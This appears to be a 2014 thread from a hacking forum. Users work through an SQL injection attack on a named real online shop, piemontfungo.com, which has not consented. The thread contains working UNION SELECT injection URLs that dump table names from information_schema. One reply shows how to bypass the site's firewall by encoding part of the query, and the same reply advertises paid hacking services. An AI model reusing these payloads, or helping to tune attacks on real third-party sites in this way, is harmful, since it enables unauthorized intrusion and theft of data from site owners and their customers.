Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
why this 400 bad request??
Posted by: tascio
Date: May 26, 2014 10:05AM

order by and union all select works

but injections to retrieve data not^^ why?

http://www.piemontfungo.com/store/index.php?prod=1888+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29

Options: ReplyQuote
Re: why this 400 bad request??
Posted by: kenjii
Date: May 26, 2014 06:56PM

Hi i look at your link and found why you can't, the database is MySQL (microsoft)server for get it i use Mssql injection what is not the one i prefer :P

You can find a lot of tutorial about mMssql injection and if you don't find you still can ask me :)

Options: ReplyQuote
Re: why this 400 bad request??
Posted by: tascio
Date: May 26, 2014 07:09PM

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/htdocs/www.piemontfungo.com/home/store/index.php on line 91

but this error tell me is a mysql db not a mssql? o_O? i dont understand ?_?

Options: ReplyQuote
Re: why this 400 bad request??
Posted by: kenjii
Date: May 26, 2014 07:20PM

i'am not a pro the only sure thing i can tell u is that use mssql injection for having it else i didn't find :(

to me it say :
Your browser sent a request that this server could not understand.
for any syntaxe i use after union, i also try for waf but seem to do not be protected....But that's why i use mssql injection...

I search other way i think you are true but haven't find yet


*i tell u wrong thing, when i finish my mssql injection(try to get more than 1 table) i got the same problem, but like for union i can get version and db name



Edited 3 time(s). Last edit at 05/26/2014 07:32PM by kenjii.

Options: ReplyQuote
Re: why this 400 bad request??
Posted by: nopesled
Date: June 02, 2014 07:42AM

This is indeed MySQL injection, you need to bypass the WAF first.

Working Query:

http://www.piemontfungo.com/store/index.php?prod=-1888+union+select+1,group_concat(0x0a,table_name),3,4,5,6,7,8,9,10,11,12+from+informa%54ion_schema.tables--

---------------------------------------------------
If you're looking for a service, contact me via PM.
I'm looking for a Darkode invite also.

Options: ReplyQuote
Re: why this 400 bad request??
Posted by: kenjii
Date: June 03, 2014 04:44AM

Thx for the hlep :)

Options: ReplyQuote


Sorry, only registered users may post in this forum.